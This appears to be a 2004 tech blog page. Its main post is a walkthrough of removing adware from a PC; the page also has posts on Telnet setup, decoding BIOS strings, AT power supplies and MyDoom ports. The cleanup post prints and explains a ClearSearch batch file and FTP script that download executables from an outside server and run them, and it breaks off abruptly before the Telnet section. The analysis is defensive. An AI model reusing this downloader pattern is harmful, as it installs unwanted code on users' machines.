ClearSearch.Net
Comet Cursors
DSO Exploit
Hotbar
Lycos.SideSearch
Test - Browser Helper Object (BHO)
VX2/e
VX2/f
VX2/h.ABetterInternet

Interestingly, the PestPatrol webpage on ClearSearch reports that "Every time the computer is started, ClearSearch will remove the search-hijacking part of Xupiter, HuntBar/MSLink, CommonName, NewDotNet, the iWon toolbar/search assistant and Netword." So apparently the software will eliminate portions of competing adware/spyware.

I had Spybot remove all of the adware/spyware it found. Spybot couldn't remove all of it immediately, so I rebooted it to let it remove the rest of it at startup. However, the system hung again after Spybot competed its work. I used Ctrl-Alt-Del again and saw a list similar to what I had seen previously.

Explorer
Systray
Scanregw
Rundll32
Starter

I chose to shut down the system, but the system didn't shut down and I couldn't bring up the task list with Ctrl-Alt-Del again. I had to power the system off and on. When I logged in again, I didn't experience the problem with the system hanging. But when I ran Spybot again to make sure that it wasn't seeing any adware/spyware, it reported two registry keys still existed for Hotbar. I had it "fix selected problems" again and then repeated the scan. This time it reported "no immediate threats were found".

As an added precaution, I installed Ad-aware 6.0 on the system. Ad-aware is available in three versions. The standard version is free for non-commercial use. If you wish to have real-time monitoring and blocking capabilities to prevent adware/spyware being installed, purchase one of the other versions. They are relatively inexpensive given the time and aggravation they can spare you by preventing adware/spyware from being installed and subsequently causing crashes, freezes, etc. on your system.

Ad-aware reported it found 28 processes and 149 objects associated with adware/spyware on the system. It isn't unusual for a particular adware/spyware detection program to find adware/spyware that another program has missed or at least some files and registry entries associated with adware/spyware that remain even though the adware/spyware has been rendered ineffective. I've run Spybot after running Ad-aware on systems and found it has detected things that Ad-aware has missed. I usually run Ad-aware, Bazooka Adware and Spyware Scanner, and Spybot Search & Destroy on systems to ensure that no adware/spyware is left on a system. Be sure to update the programs' reference files so that you ensure you are checking for recently detected adware/spyware before you run checks on a system.

Ad-aware reported a number of tracking cookies, which I'm not as concerned about, but objects associated with the adware/spyware listed below were found as well. I'm not concerned about Ad-aware finding Alexa, since the Alexa toolbar isn't installed. Even if a system doesn't have the Alexa toolbar installed, you will likely see Alexa reported by Ad-aware, since it comes bundled with Internet Explorer. The Adware and Under-Wear - The Definitive Guide article has further information on Alexa, as well as other adware/spyware. The article states that in 2001 a $1.9 million fine was levied against the company responsible for Alexa for violating users' privacy.

Alexa
ClearSearch
CometCursor
Coulomb Dialer
HotBar
VX2.BetterInternet
FavoriteMan
WinPup32

Ad-aware reported "Some objects could not be removed" and asked if I wanted to let Ad-aware remove them after the next reboot. The only one it reported was c:\program files\clearsearch\ie_clrsch.dll. I instructed it to remove the object after the next reboot and then rebooted the sysem. Ad-ware completed its check when the system booted and I reran the program yet again for good measure. This time the program didn't find any adware/spyware, reporting "0 New objects" were found.

There are still four items on the desktop that I believe are associated with ClearSearch, though. The file names are as follows:

o
o.bat
ClrSchP028.exe
Calsdr.exe

The batch file o.bat contained the following lines:

if not exist C:\WINDOWSstatuslog ftp -s:o if exist ClrSchP028.exe ClrSchP028.exe if exist calsdr.exe calsdr.exe

The first line checks to see if the file WINDOWSstatuslog exists in C:\. If the file doesn't exist, the File Transfer Protocol (FTP) program that comes with windows is started. The "-s" specifies that a script should be executed (you can see other options by typing " ftp -h" at a command prompt). The script is a text file with the name of the file following the colon. In this case the name of the file is "o". After the first line is executed, the batch file will check to see if ClrSchP028.exe and calsdr.exe exist and will execute them if they exist. By checking for their existence first, the batch file avoids the display of an error message by your system.

Looking at the contents of the file titled "o", I see the following:


open downloads.default-homepage-network.com

tmpacct

12345

bin

get ClrSchP028.exe

get calsdr.exe

bye

The first line tells the ftp program to open a connection to the system downloads.default-homepage-network.com. An FTP server will prompt for a userid and password. So the second line transmits a userid of "tmpacct" and the following line transmits the password "12345". On the next line, the "bin" command sets the file transmitssion mode to use binary rather than text transmissions. That command is needed to ensure that there is no attempt to translate end of line markers in files transmitted. The next two "get" commands instruct the FTP server to transmit the two programs, ClrSchP028.exe and calsdr.exe. The last line terminates the connection to the FTP server.

So, if the two files were received from the FTP server they will be executed by the o.bat batch file. Looking at the ClrSchP028.exe file with FileAlyzer, a tool available from the developer of Spybot Search & Destroy, which will allow one to analyze the contents of files, I see there is a company name, Clear Search, listed in the file (see Figure 1). Using FileAlyzer's hex dump capability, I looked for text in the file. I see the program will attempt to contact sds.clrsch.com for updates (see Figure 2).

I deleted the four ClearSearch files from the desktop by right-clicking on them and choosing "delete".

If you have a question about whether a program is spyware you can go to Spychecker and enter the name of the program in its search field. The site also has links to a number of anti-spyware tools. You can also check on a file using Kephyr's searchable database.

I updated the Norton Antivirus 2000 virus definitions and checked the system with that program as well. It found a Trojan on the system, which it quarantined.

Name	Virus
do.exe	Download.Trojan

While I was checking the folders under C:\Program Files, I noticed a there was a C:\Program Files\ClearSearch folder still on the system. The only file in it, IE_ClrSch.DLL, is a 78 KB file dated 3/22/04 8:13 PM. When I tried to remove the file, I received a message that "the specified file is being used by Windows." I ran another Ad-aware scan, which found ClearSearch again. It reported the following for ClearSearch:

Vendor

Type

Starting the Telnet Service

Click on Start
Select Administrative Tools
Select Services
Scroll down until you find the Telnet service
Double-click on Telnet
Change the startup type to Automatic
Click on Apply
Double-click on Start
Click on OK
Close the Services window by selecting File then Exit

Configuring the Telnet Service for NT Authentication

Normally the telnet service will allow transmission of passwords in plaintext, i.e. in unencrypted format. Someone with a sniffer can learn the userid and password if unencrypted passwords are allowed. So ensure that only NT authentication is used, which will prevent plaintext passwords from being used to make the connection.

Click on Start
Select All Programs
Select Accessories
Select Command Prompt
Type tlntadmn config sec=-passwd and hit the Enter key. You should see "The settings were successfully updated."
You can check the settings by typing tlntadm. For "authentication mechanism" you should see only NTLM

Note: If you wish to see other options for the tlntadm command you can type tlntadm /?

Specifying Telnet Clients

Under Windows Small Business Server 2003, you must also stipulate which userids are allowed to make Telnet connections to the server. To do so, take the steps below.

Click on Start
Select All Programs
Select Administrative Tools
Select Active Directory Users and Computers
In the right pane, double-click on Telnet Clients
Click on the Members tab
Click on Add
Under Enter the object names to select, put in the userids for which you wish to allow access
You can click on Check Names to check the validity of names you have entered
Click on OK when finished
Click on OK again at the TelnetClients Properties window
Click on File then Exit at the Active Directory Users and Computers window

References:

Description of the Telnet Server Service Administration Tool

[/os/windows/server2003] permanent link

Identifying a Motherboard from the Award BIOS String

When I turned on a fairly old PC, I received a memory test fail error as the system started the boot process. I opened the system to look for the motherboard model number, but couldn't find one, though I saw "Matsonic" stamped on the motherboard.

Since the system displayed the BIOS string at the bottom of the screen, I thought I should be able to identify the motherboard model from that string. The information displayed on the screen is shown below.

Award Modular BIOS v4.51PG, An Energy Star Ally Copyright (C) 1984-97, Award Software, Inc. Release 04/30/1998 S PENTIUM-S CPU at 133MHz Memory Test: 90112K OK Award Plug and Play BIOS Extension v1.0A Copyright (C) 1997, Award Software, Inc. Detecting HDD Primary Master None Memory test fail Press F1 to continue, DEL to enter SETUP 04/30/98-537+UMC8670F-2A5LDH09C-00

The BIOS string is in the last line. I know Award is the BIOS manufacturer, since I see "Award Plug and Play BIOS". The second to last group of dash separated characters, "2A5LDH09C" should hopefully identify the motherboard model. The interpretation of the BIOS string is as follows:

04/30/98-537+UMC8670F-2A5LDH09C-00

mm/dd/yy - the BIOS date in the form of month/date/year
For newer BIOS releases, you may see mm/dd/yyyy. In this case, the BIOS date is April 30, 1998.

The next group of characters after the first dash is usually used by the manufacturer for chipset and I/O name. In this case, I see "537+UMC8670F"

2A5LDH09C - the next group of dash separated characters can be interpreted as follows.

1^st Character

2^nd Character

3^rd Character

4^th Character

5^th Character

6^th Character¹

7^th and 8^th Characters

9^th and 10^th Characters

BIOS Application

Bus System / Topology

CPU Type

Chipset Manufacturer

Chipset Name

Flash Identifier
(optional)

Manufacturer Code

Model ID

1	BIOS before v4.2
2	EliteBIOS v4.5x (commonly known as Award Modular BIOS 4.51PG)
3	PowerBIOS v5.0 (Software on floppy disk)
4	CardWare PCMCIA
5	CAMPliant SCSI
6	Medallion BIOS v6.00
7	Socket services
8	Card services
9	OEM card manufacturing kit

1 - ISA
2 - PS/2
3 - EISA Video
4 - Other
5 - EISA / ISA
6 - SCSI
7 - PCMCIA
8 - SCSI / CAM
9 - SCSI / CAMkit
A - ISA / PCI
B - EISA / PC
C - ISA / PM
D - EISA / PM
E - PCI / PnP

1 - 8086 / 8088
2 - 80286
3 - 80386
4 - 80486
5 - Pentium class
6 - Pentium II/III class OR Cyrix 386
7 - Cyrix 486
8 - 386SL
9 - 386SX
A - 42
B - 80C51SL
E - EGA
U - Universal
V - VGA

1 - ALD
3 - Cyrix
5 - ST Micro
6 - ATI Tech
9 - Intel
D - HiNT
G - VLSI
H - Contaq
I - SiS
J - Symphony [Winbond]
K - Acer Labs Inc ALi
L - VIA
O - EFAR
R - Forex
S - AMD
T - ACC Micro
U - OPTi
V - SARC
X - UMC

Only useful with
chipset manufacturer
( see complete listing )

i	Intel 12V
s	SST 5V Flash ROM

A0	ASUSTeK Computer Inc. (Formerly Aorta Systems
A1	ABIT Computer Corp.
A2	A-Trend Technology Co., Ltd.
A3	Aquarius Systems, Inc. (ASI)
A5	AXIOM Technology Co., Ltd.
A7	AVT Industrial Ltd.
A8	Adcom
AB	Aopen Inc.
AD	Amaquest Computer Corp.
AK	Advantech Co., Ltd.
AM	ACHME
AT	ASK Technology Ltd.
AX	Achitec
B0	Biostar Microtech Corp.
B1	BEK-Tronic Technology
B2	Boser Technology Co., Ltd.
B3	BCM Advanced Research
BK	Albatron Computer Corp.
C0	Chaintech Computer Co., Ltd.
C1	Clevo Co.
C2	Chicony Electronics Co., Ltd.
C3	Chaintech Computer Co., Ltd.
C5	Chaplet Systems Inc.
C9	CompuTrend Systems, Inc.
CF	Flagpoint
CS	CSS Laboratories
CV	California Graphics USA Distribution
D0	DataExpert Corp.
D1	DTK Computer, Inc. (Advance Creative Computer)
D2	Digital Equipment Corp. (Purchased by Compaq)
D3	American Digicom Corp.
D4	Diamond Flower Electric Instrument Co.
D7	Daewoo Telecom
D8	Nature Worldwide Technology Corp.
DE	Dual Technology Corp.
DI	Domex Computer Services (DTC)
DJ	Darter Technology Inc.
DL	Delta Electronics, Inc.
E1	Elitegroup Computer Co., Ltd.
E3	EFA Corp.
E4	ESPCo (Elite Spirit Co., Ltd.)
E6	Elonex PLC
EC	ENPC Technology Corp.
EO	Evalue Technology Inc.
F0	First International Computer, Inc.
F1	Flytech Group International
F2	Flexus Computer Technology Inc.
F3	Full Yes Industrial Corp.
F5	FuguTech
F8	Formosa Industrial Computing, Inc.
F9	Ford Lian International Ltd.
FG	Fastfame Technology Co., Ltd.
G0	Gigabyte Technology Co., Ltd.
G3	Gemlight Computer Ltd.
G5	GVC Corp.
G9	Global Circuit Technology
G9	C.P. Technology Co. Ltd.
GA	Giantec Inc.
GE	Globe Legate Co. Ltd
H0	PC Chips Manufacturing² (Hsing Tech)
H2	Shuttle Computer Group Inc. (Holco)
HH	HighTech Information System
HJ	Sono Computer Co., Ltd.
I3	Iwill Corp.
I4	Inventa
I5	Informtech International Ltd.
I7	Inlog Microsystem Co Ltd
I9	ICP
IC	Inventec Corp.
IE	Industrial Technology Research Institute
J1	Jetway Information Co. Ltd.
J1	J-Mark Computer Corp.
J2	Jamicon Electronics
J3	J-Bond
J4	Jetta International Inc.
J6	Joss Technology Ltd.
K0	Kapok Corp.
K1	Kaimei Corp.
KF	KINPO Electronic
L1	Lucky Star Technology Co., Ltd.
L7	Lanner Electronics Inc.
L9	Lucky Tiger
LB	Leadtek
M0	Matra
M2	MyComp
M3	Mitac
M4	Micro-Star International Co., Ltd.
M8	Mustek Corp.
M9	Micro Leader Enterprises
MH	Macrotek
MP	Maxtium Computer Corp.
N0	Nexcom
N5	NEC
NM	NMC
NX	Nexar
O0	Ocean Office Automation Ltd.
P1	PC Chips
P6	Protech
P8	AZZA Technology Inc.
P9	Powertech
PA	EPoX Computer Co., Ltd.
PC	Pine Technology
PF	President (Formerly Wang Labs)
PK	ALD Technology Ltd.
PN	Procomp Informatics Ltd.
PR	Super Grace Electronics Ltd.
PS	Palmax
PX	Pionix
Q0	Quanta
Q1	QDI (Quantum Designs Ltd.)
R0	Rise Computer Inc.
R2	Rectron
R3	Datavan International Corp.
R9	RSAP Technology
RA	RioWorks Solutions Inc.
S2	Soyo Computer Inc.
S3	Smart D&M Technology Co., Ltd.
S5	Holco Enterprise Co., Ltd.
S9	Spring Circle Computer Inc.
SA	Seanix
SC	Sukjung (Auhua Electronics Co. Ltd.)
SE	New Tech
SH	Luckytech Technology Co. Ltd.
SJ	Sowah (H.K.) Limited
SM	Hope Vision, SuperPower, San Li
SN	Soltek
SW	S&D
SX	Super Micro Computer, Inc.
T0	Twinhead
T4	Taken
T5	Tyan Computer Corp.
T6	Trigem
TB	Taeli (Techmedia)
TG	Tekram
TJ	Totem Technology Co., Ltd.
TL	Transcend Information, Inc.
TP	Taiwan Commate Computer Inc.
TR	Top Star
TW	T&W Electronics (CZ) Co., Ltd.
TX	Tsann Kuen Enterprise Co., Ltd. (EUPA Computer)
TY	Aeton Technology Inc.
U0	U-Board
U1	Universal Scientific Industrial
U2	UHC Advanced Integration Research
U3	Umax
U4	Unicorn Computer Corp.
U6	Unitron
U9	Warp Speed Ink.
V3	VTech (PC Partner Ltd.)
V5	Vision Top
V6	Vobis
V7	YKM (Dayton Micron)
W0	WinTechnologies (Edom)
W1	Well Join Industry Co., Ltd.
W5	Winco Electronics
W7	Win Lan Enterprise
W9	Weal Union Development Ltd.
XA	ADLink Technology Inc.
X3	ACORP International
X5	Arima Computer Corp.
Y2	Yamashita Engineering Manuf., Inc.
Z1	Zida Technologies Ltd.
Z3	ShenZhen Zeling Industrial Co., Ltd.

Manufacturer specific

1 This character may not be present. If you don't see an "i" or "s" in the 6^th position, then the next two characters represent the manufacturer code.
2 PC Chips is just an OEM distributor for Hsing Tech.

The last group of digits, which in the case of the string "04/30/98-537+UMC8670F-2A5LDH09C-00" is "00", specify the BIOS version with "00" representing the initial release.

If I look up the chipset code 2A5LD, I see it corresponds to the VIA Apollo VPX (VXPro+) chipset. And I do see a Via chip next to the Award BIOS chip on the motherboard. The H0 after 2A5LD identifies the motherboard manufacturer as PC Chips, a distributor for Hsing Tech. At the Plasma Online website, I see that the Matsonic MS-5120 motherboard uses a VXPro+ chipset and is identical to the PC Chips M537DMA33 motherboard, so now I may be able to find a manual at the website for one of those companies which will tell me the maximum amount of memory the motherboard will support.

I went to the Matsonic website first. This company does a poor job of technical support. Not only didn't they put the model number on the motherboard, they don't provide any on-line manuals and I couldn't find any information at all on the site for the MS-5120 motherboard.

So I then went to the USA website for PC Chips at http://www.pcchipsusa.com. Fortunately, this company provides a manual for the M537D motherboard at http://www.pcchipsusa.com/support-discontinued-manuals.asp. However, that manual doesn't match my motherboard, since the USB connector on my motherboard isn't between the ISA and PCI slots as depicted in the manual, nor do the Via chip numbers shown in the manual match the numbers on the ones on my motherboard.

Fortunately, a Google search did provide a link to a site with Matsonic manuals. The manual for the MS-5120 motherboard indicates it can handle a maximum of 384 MB of memory. The manual states SIMM 3,4 and DIMM1 can not be use at the same time.

References:

[/pc/hardware/motherboard] permanent link

AT Power Supply

Newer PCs will have an ATX power supply, while older ones may have an AT power supply. The AT power supply will have two sets of cables extending from it. When you connect the cables to the motherboard, the black wires from each set should go next to one another at the motherboard connector. The pinout for an AT power supply is shown below.

[/pc/hardware/power-supply] permanent link

MyDoom

The Internet Storm Center is listing the following as the top ten attacked ports today:

Top Attacked Ports
mydoom	3127
epmap	135
ms-sql-m	1434
netbios-ns	137
www	80
SubSeven	27374
microsoft-ds	445
socks	1080
squid-http	3128
amanda	10080

Several of these ports are assoicated with the MyDoom worm. When a system is infected by the MyDoom.A variant of the worm, the worm opens TCP ports 3127 through 3198, which explains why both of those ports are listed in the top ten attacked ports for today. A later variant of the worm, MyDoom.B may use TCP ports 80, 1080, 3128, 8080 and 10080, which may be why all of those ports, but port 8080, appear in the top ten list for today, though I would expect port 80 attacks to be high even without this worm, since port 80 is the port most commonly used by webservers.

Ports 1080 and 10080, like port 80, have additional uses other than providing a mechanism for the MyDoom worm to provide a backdoor into systems. Port 80 is used for the socks protocol. Socks is an Internet Engineering Task Force (IETF) standard proxy protocol for IP applications. The Advanced Maryland Automatic Network Disk Archiver(AMANDA) uses UDP port 10080, but not TCP port 10080. Amanda is a backup system that allows the administrator of a LAN to set up a single master backup server to back up multiple hosts to a single large capacity tape drive.

[/security] permanent link

Fri, Dec 17, 2004 9:05 pm

Thu, Dec 16, 2004 11:42 am

Tue, Dec 14, 2004 1:43 am

Wed, Dec 01, 2004 3:41 pm

Mon, Nov 15, 2004 11:29 pm

Sun, Nov 14, 2004 3:42 pm

Fri, Nov 12, 2004 12:20 pm

Thu, Nov 11, 2004 11:03 pm

Tue, Nov 09, 2004 12:43 am

Fri, Nov 05, 2004 8:58 pm

Mon, Nov 01, 2004 11:11 am

Tue, Oct 26, 2004 1:05 pm

Wed, Oct 20, 2004 9:12 pm

Fri, Oct 08, 2004 5:20 pm

Wed, Sep 29, 2004 5:51 pm

Fri, Sep 24, 2004 3:15 pm

Thu, Sep 23, 2004 7:32 pm

Mon, Sep 20, 2004 1:13 am

Sun, Sep 19, 2004 8:58 pm

Fri, Sep 17, 2004 8:40 pm

Wed, Sep 15, 2004 11:10 pm

Wed, Sep 15, 2004 11:09 am

Sun, Sep 12, 2004 10:46 pm

Mon, Aug 30, 2004 8:38 pm

Mon, Aug 30, 2004 5:36 pm

Sat, Aug 28, 2004 12:32 am

Tue, Aug 24, 2004 11:10 pm

Mon, Aug 23, 2004 11:05 pm

Wed, Aug 11, 2004 12:07 pm

Mon, Jul 26, 2004 11:16 pm

Fri, Jul 23, 2004 10:20 pm

Mon, Jul 19, 2004 8:47 pm

Thu, Jul 15, 2004 10:59 pm

Thu, Jul 15, 2004 12:06 pm

Tue, Jul 13, 2004 9:16 pm

Mon, Jul 12, 2004 5:17 pm

Sat, Jun 12, 2004 9:12 pm

Thu, Jun 10, 2004 1:52 pm

Thu, Jun 03, 2004 12:25 pm

Mon, May 10, 2004 8:36 pm

Thu, Apr 22, 2004 6:27 pm

Mon, Apr 19, 2004 3:28 pm

Tue, Apr 13, 2004 8:39 pm

Sun, Apr 04, 2004 11:12 pm

Wed, Mar 31, 2004 5:07 pm

Sun, Mar 28, 2004 10:20 pm

Fri, Mar 26, 2004 6:27 pm

Tue, Mar 23, 2004 5:25 pm

Mon, Mar 15, 2004 12:25 pm

Sun, Mar 14, 2004 9:29 pm

Sun, Mar 14, 2004 8:44 pm

Starting the Telnet Service

Configuring the Telnet Service for NT Authentication

Specifying Telnet Clients

Sun, Feb 22, 2004 9:01 pm

Sat, Feb 14, 2004 9:00 am

Fri, Feb 13, 2004 10:33 pm